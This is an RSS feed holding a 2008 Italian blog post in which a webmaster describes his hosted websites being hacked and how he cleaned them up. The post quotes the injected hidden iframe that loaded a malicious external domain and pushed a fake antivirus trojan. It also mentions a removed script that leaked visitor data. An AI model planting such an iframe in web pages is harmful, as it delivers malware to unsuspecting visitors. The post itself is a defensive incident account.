<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" >

<channel>
	<title>Simone Chiaromonte &#187; sicurezza</title>
	<atom:link href="http://simone.chiaromonte.com/tag/sicurezza/feed/" rel="self" type="application/rss+xml" />
	<link>http://simone.chiaromonte.com</link>
	<description>Solo un altro SEO, SEM, DEM e Webmaster Freelance a Bologna e Ascoli Piceno</description>
	<lastBuildDate>Sun, 20 Dec 2009 13:40:54 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Il regalo di Natale degli Hacker</title>
		<link>http://simone.chiaromonte.com/internet/regalo-natale-hacker/</link>
		<comments>http://simone.chiaromonte.com/internet/regalo-natale-hacker/#comments</comments>
		<pubDate>Sun, 28 Dec 2008 13:32:15 +0000</pubDate>
		<dc:creator>Simone</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[antivirus]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[hosting]]></category>
		<category><![CDATA[sicurezza]]></category>

		<guid isPermaLink="false">http://simone.chiaromonte.com/?p=411</guid>
		<description><![CDATA[E che volete farci! Ci sono e in qualche modo bisogna conviverci: scrivo questo post un po&#8217; in ritardo ma il 26 Dicembre, grazie alla segnalazione di Paolo (quando metti su il blog avvisami), un mio lettore, mi sono effettivamente accorto che il mio sito e moltissimi altri nel mio hosting hanno subito un attacco [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-413" title="hacker siti web" src="http://simone.chiaromonte.com/wp-content/uploads/hacker-siti.jpg" alt="hacker siti web" width="127" height="95" />E che volete farci! Ci sono e in qualche modo bisogna conviverci: scrivo questo post un po&#8217; in ritardo ma il 26 Dicembre, grazie alla segnalazione di Paolo (quando metti su il blog avvisami), un mio lettore, mi sono effettivamente accorto che il mio sito e moltissimi altri nel <a title="Servage Hosting" href="http://simone.chiaromonte.com/internet/pregi-difetti-servage-hosting/">mio hosting</a> hanno <strong>subito un attacco hacker</strong>.</p>
<p>Praticamente, probabilmente <em>sfruttando le debolezze dell&#8217;hosting</em> oppure utilizzando le mie credenziali di accesso via FTP (cosa che mi sembra molto improbabile), è riuscito a <strong>modificare tutte le pagine index</strong> (sia <em>html</em> che <em>php</em>) di tutti i miei siti web inserendo il seguente iframe:</p>
<blockquote><p>&lt;iframe src=&#8221;http://thedeadpit.com/?click=xxxxxx&#8221; width=1 height=1 style=&#8221;visibility:hidden position:absolute&#8221;&gt;</p></blockquote>
<p>e un codice che ora ho cancellato che si collegava a <a title="Whois di Google-stats.com" href="http://whois.domaintools.com/google-stats.com" target="_blank">google-stats.com</a> e forniva (probabilmente) tutte le informazioni dei visitatori ai miei siti, ma che non ha nulla a che fare con google! Infatti se provate a collegarvi a quel sito si vieni subito dirottati a Google.it! Incredibile!</p>
<p><strong>L&#8217;iframe invece chiudeva il browser</strong> e generava un messaggio di errore nel quale si consigliava di istallare un antivirus (pensa un po&#8217; che bell&#8217;antivirus poteva essere) cliccando su OK. Mi hanno segnalato che <a title="Download di Avast Antivirus" href="http://www.avast.com/ita/download-avast-home.html" target="_blank">Avast Antivirus</a> lo segnalava come Trojan, ma per noi che <a title="utilizzo di applicazioni per linux" href="http://simone.chiaromonte.com/blog/ubuntu/">utilizziamo linux</a> non abbiamo questo problema! :-)</p>
<p>Morale: ho dovuto <strong>controllare e modificare i file index.php</strong> (anche quelli che finivano con index es. BoardIndex.php) di tutti i miei siti web, e modificare anche le credenziali di accesso! Non so dire con esattezza quale possa essere stata la <a title="Ulteriori informazioni sull'attacco Hacker" href="http://forums.digitalpoint.com/showthread.php?t=1151323" target="_blank">causa di questo problema</a>; il supporto del mio hosting servage mi risponde così:</p>
<blockquote><p><span style="font-family: Verdana; font-size: x-small;"><span style="font-family: Verdana; font-size: x-small;">Our servers are secured. Most of attackers use an upload script that allows visitors of the website to upload files. Please change your account password and check that no folders have insecure permissions such as 777 (unlimited access).</span></span></p></blockquote>
<p>Però le cartelle dei siti web avevano i permessi 755, il che significa che solo il proprietario ha i permessi di scrittura, per questo ho supposto che l&#8217;hacker ha probabilmente sfruttato le debolezze del server o ha &#8220;sgamato&#8221; la mia user e pass dell&#8217;FTP&#8230; ma non ci credo a quest&#8217;ultima ipotesi ;-)</p>
]]></content:encoded>
			<wfw:commentRss>http://simone.chiaromonte.com/internet/regalo-natale-hacker/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
